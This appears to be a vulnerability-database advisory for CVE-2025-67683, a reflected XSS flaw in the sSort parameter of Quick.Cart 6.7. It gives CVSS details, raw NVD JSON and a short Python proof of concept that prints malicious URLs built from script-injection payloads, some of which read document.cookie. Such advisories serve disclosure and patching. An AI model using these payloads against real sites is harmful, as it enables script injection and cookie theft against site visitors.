Security Vulnerability Report
中文
CVE-2025-67683 CVSS 6.1 MEDIUM

CVE-2025-67683

Published: 2026-01-22 12:15:55
Last Modified: 2026-02-19 18:33:51

Description

Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim’s browser. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cart:6.7:*:*:*:*:*:*:* - VULNERABLE
Quick.Cart 6.7(确认受影响)
Quick.Cart 其他版本(可能受影响,未经测试)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import urllib.parse # CVE-2025-67683 PoC - Quick.Cart sSort Parameter Reflected XSS # Target URL (adjust to actual vulnerable instance) base_url = "http://target-site.com/quick.cart/" # XSS payload - Simple alert demonstration xss_payload = "'><script>alert('XSS Vulnerability CVE-2025-67683')</script>" # Construct malicious URL with sSort parameter malicious_url = f"{base_url}?sSort={urllib.parse.quote(xss_payload)}" print("=== CVE-2025-67683 Reflected XSS PoC ===") print(f"Target: {base_url}") print(f"Vulnerable Parameter: sSort") print(f"Payload: {xss_payload}") print(f"Malicious URL:\n{malicious_url}") # Alternative payloads for testing print("\n=== Alternative Payloads ===") payloads = [ '" onfocus="alert(document.cookie)" x="', '<img src=x onerror="alert(document.domain)">', 'javascript:alert(document.cookie)', ] for payload in payloads: print(f"URL: {base_url}?sSort={urllib.parse.quote(payload)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67683", "sourceIdentifier": "[email protected]", "published": "2026-01-22T12:15:55.260", "lastModified": "2026-02-19T18:33:51.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim’s browser.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}, {"lang": "es", "value": "Quick.Cart es vulnerable a XSS reflejado a través del parámetro sSort. Un atacante puede crear una URL maliciosa que, al abrirse, resulta en la ejecución arbitraria de JavaScript en el navegador de la víctima.\n\nEl proveedor fue notificado tempranamente sobre esta vulnerabilidad, pero no respondió con los detalles de la vulnerabilidad o el rango de versiones vulnerables. Solo la versión 6.7 fue probada y confirmada como vulnerable, otras versiones no fueron probadas y también podrían ser vulnerables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cart:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "0544991D-06F2-4207-BAA0-5045BC483E61"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/01/CVE-2025-67683", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/sklep-internetowy-quick-cart.html", "source": "[email protected]", "tags": ["Product"]}]}}